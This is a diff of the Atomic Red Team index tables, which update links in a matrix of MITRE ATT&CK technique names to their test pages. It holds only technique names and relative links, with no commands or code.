 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
@@ -109,7 +109,7 @@
 |  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
@@ -7,15 +7,15 @@
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter](../../T1059/T1059.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
@@ -36,12 +36,12 @@
 |  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Process Injection](../../T1055/T1055.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
